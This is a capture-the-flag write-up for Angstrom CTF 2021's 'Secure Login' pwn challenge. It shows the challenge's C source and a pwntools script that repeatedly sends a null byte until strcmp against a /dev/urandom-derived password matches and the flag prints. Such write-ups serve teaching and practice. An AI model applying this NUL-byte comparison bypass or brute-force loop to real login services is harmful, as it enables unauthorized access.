Writeup for Secure Login (pwn) - Angstrom CTF (2021) 💜
Video Walkthrough
Challenge Description
My login is, potentially, and I don't say this lightly, if you know me you know that's the truth, it's truly, and no this isn't snake oil, this is, no joke, the most secure login service in the world (source).
Source
#include<stdio.h>

// NOTE(review): strcmp() and exit() are called below without <string.h> /
// <stdlib.h>; as shown, the source relies on implicit declarations.

// Global buffer holding the "password" the user has to match.
char password[128];

// Fill `password` from /dev/urandom using fgets().
// fgets() stops at the first 0x0a byte or after 127 bytes and then appends a
// NUL, so the password can be far shorter than 128 bytes, and any 0x00 byte
// that happens to land in the buffer is where strcmp() in main() stops
// comparing.  The fopen() result is not checked before use.
void generate_password() {
    FILE *file = fopen("/dev/urandom", "r");
    fgets(password, 128, file);
    fclose(file);
}

// Entry point (non-standard `void main`; a conforming program uses `int main`).
void main() {
    puts("Welcome to my ultra secure login service!");
    // no way they can guess my password if it's random!
    generate_password();
    char input[128];
    printf("Enter the password: ");
    fgets(input, 128, stdin);
    // Vulnerability: a C-string comparison only looks at bytes up to the first
    // NUL on either side.  If the first byte read from /dev/urandom is 0x00
    // (roughly 1 chance in 256 per run), an input whose first byte is 0x00
    // compares equal and the flag is printed.  A fixed-length memcmp() against
    // a buffer that was never NUL-terminated mid-way (or a real credential
    // check) would not have this property.
    if (strcmp(input, password) == 0) {
        char flag[128];
        FILE *file = fopen("flag.txt", "r");
        if (!file) {
            puts("Error: missing flag.txt.");
            exit(1);
        }
        fgets(flag, 128, file);
        puts(flag);
    } else {
        puts("Wrong!");
    }
}
Solution
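from pwn import *


def start(argv=None, *a, **kw):
    """Launch the target and return a pwntools tube.

    Args:
        argv: extra command-line arguments appended after the binary path
            (``None`` means none).
        *a, **kw: passed straight through to ``gdb.debug`` / ``remote`` /
            ``process``.

    Returns:
        A GDB-attached process when run with ``GDB=1``, a socket to
        ``sys.argv[1]:sys.argv[2]`` when run with ``REMOTE=1``, otherwise a
        local process.
    """
    argv = list(argv or [])
    if args.GDB:
        # Set GDBscript below
        return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
    if args.REMOTE:
        # ('server', 'port')
        return remote(sys.argv[1], sys.argv[2], *a, **kw)
    # Run locally
    return process([exe] + argv, *a, **kw)


# Specify your GDB script here for debugging
gdbscript = '''
init-pwndbg
continue
'''

# Set up pwntools for the correct architecture
exe = './login'
# This will automatically get context arch, bits, os etc
elf = context.binary = ELF(exe, checksec=False)

# Enable verbose logging so we can see exactly what is being sent (info/debug)
context.log_level = 'warn'

# ===========================================================
#                    EXPLOIT GOES HERE
# ===========================================================

# The service compares the input against a /dev/urandom-filled buffer with
# strcmp(), which only examines bytes up to the first NUL.  A lone 0x00 byte
# therefore matches whenever the first random byte is 0x00 (about 1 run in
# 256), so a fresh process is started repeatedly until that happens.
ATTEMPTS = 1000

for attempt in range(ATTEMPTS):
    io = start()
    try:
        io.recv()
        # Try to login with null byte
        io.sendline(b"\x00")
        # Tubes speak bytes; a str pattern is deprecated in recent pwntools.
        io.recvuntil(b': ')
        response = io.recv()
    finally:
        # Always release the process/socket, even if a recv() times out.
        io.close()
    # Did we get the flag?
    if b'Wrong!' not in response:
        print(response)
        break  # no point in spawning the remaining processes
else:
    print("No match after %d attempts; try again" % ATTEMPTS)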